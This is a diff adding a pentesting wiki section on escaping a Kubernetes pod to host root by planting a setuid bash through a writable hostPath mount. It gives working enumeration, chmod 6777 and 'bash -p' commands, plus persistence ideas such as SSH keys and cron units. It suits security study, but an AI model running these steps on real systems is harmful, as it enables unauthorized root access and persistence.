diff --git a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md index 51cdd7983f..ef6bd460a7 100644 --- a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md +++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md @@ -22,6 +22,56 @@ You can check this **docker breakouts to try to escape** from a pod you have com https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html {{#endref}} +### Abusing writable hostPath/bind mounts (container -> host root via SUID planting) + +If a compromised pod/container has a writable volume that maps directly to the host filesystem (Kubernetes hostPath or Docker bind mount), and you can become root inside the container, you can leverage the mount to create a setuid-root binary on the host and then execute it from the host to pop root. + +Key conditions: +- The mounted volume is writable from inside the container (readOnly: false and filesystem permissions allow write). +- The host filesystem backing the mount is not mounted with the nosuid option. +- You have some way to execute the planted binary on the host (for example, separate SSH/RCE on host, a user on the host can execute it, or another vector that runs binaries from that path). + +How to identify writable hostPath/bind mounts: +- With kubectl, check for hostPath volumes: kubectl get pod -o jsonpath='{.spec.volumes[*].hostPath.path}' +- From inside the container, list mounts and look for host-path mounts and test writability: + +```bash +# Inside the compromised container +mount | column -t +cat /proc/self/mountinfo | grep -E 'host-path|kubernetes.io~host-path' || true +findmnt -T / 2>/dev/null | sed -n '1,200p' +# Test if a specific mount path is writable +TEST_DIR=/var/www/html/some-mount # replace with your suspected mount path +[ -d "$TEST_DIR" ] && [ -w "$TEST_DIR" ] && echo "writable: $TEST_DIR" +# Quick practical test +printf "ping\n" > "$TEST_DIR/.w" +``` + +Plant a setuid root binary from the container: + +```bash +# As root inside the container, copy a static shell (or /bin/bash) into the mounted path and set SUID/SGID +MOUNT="/var/www/html/survey" # path inside the container that maps to a host directory +cp /bin/bash "$MOUNT/suidbash" +chmod 6777 "$MOUNT/suidbash" +ls -l "$MOUNT/suidbash" +# -rwsrwsrwx 1 root root 1234376 ... /var/www/html/survey/suidbash +``` + +Execute on the host to get root: + +```bash +# On the host, locate the mapped path (e.g., from the Pod spec .spec.volumes[].hostPath.path or by prior enumeration) +# Example host path: /opt/limesurvey/suidbash +ls -l /opt/limesurvey/suidbash +/opt/limesurvey/suidbash -p # -p preserves effective UID 0 in bash +``` + +Notes and troubleshooting: +- If the host mount has nosuid, setuid bits will be ignored. Check mount options on the host (cat /proc/mounts | grep ) and look for nosuid. +- If you cannot get a host execution path, similar writable mounts can be abused to write other persistence/priv-esc artifacts on the host if the mapped directory is security-critical (e.g., add a root SSH key if the mount maps into /root/.ssh, drop a cron/systemd unit if maps into /etc, replace a root-owned binary in PATH that the host will execute, etc.). Feasibility depends entirely on what path is mounted. +- This technique also works with plain Docker bind mounts; in Kubernetes it’s typically a hostPath volume (readOnly: false) or an incorrectly scoped subPath. + ### Abusing Kubernetes Privileges As explained in the section about **kubernetes enumeration**: @@ -393,6 +443,15 @@ Off-Menu + - [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI) +## References + +- [Forgotten (HTB) - Writable bind mount SUID planting](https://0xdf.gitlab.io/2025/09/16/htb-forgotten.html) +- [Kubernetes hostPath volume](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath) +- [Docker bind mounts](https://docs.docker.com/storage/bind-mounts/) +- [Bash -p (preserve privileges)](https://www.gnu.org/software/bash/manual/bash.html#Invoking-Bash) +- [mount(8) nosuid option](https://man7.org/linux/man-pages/man8/mount.8.html) +- [Peirates (Kubernetes attack tool)](https://github.com/inguardians/peirates) + {{#include ../../banners/hacktricks-training.md}}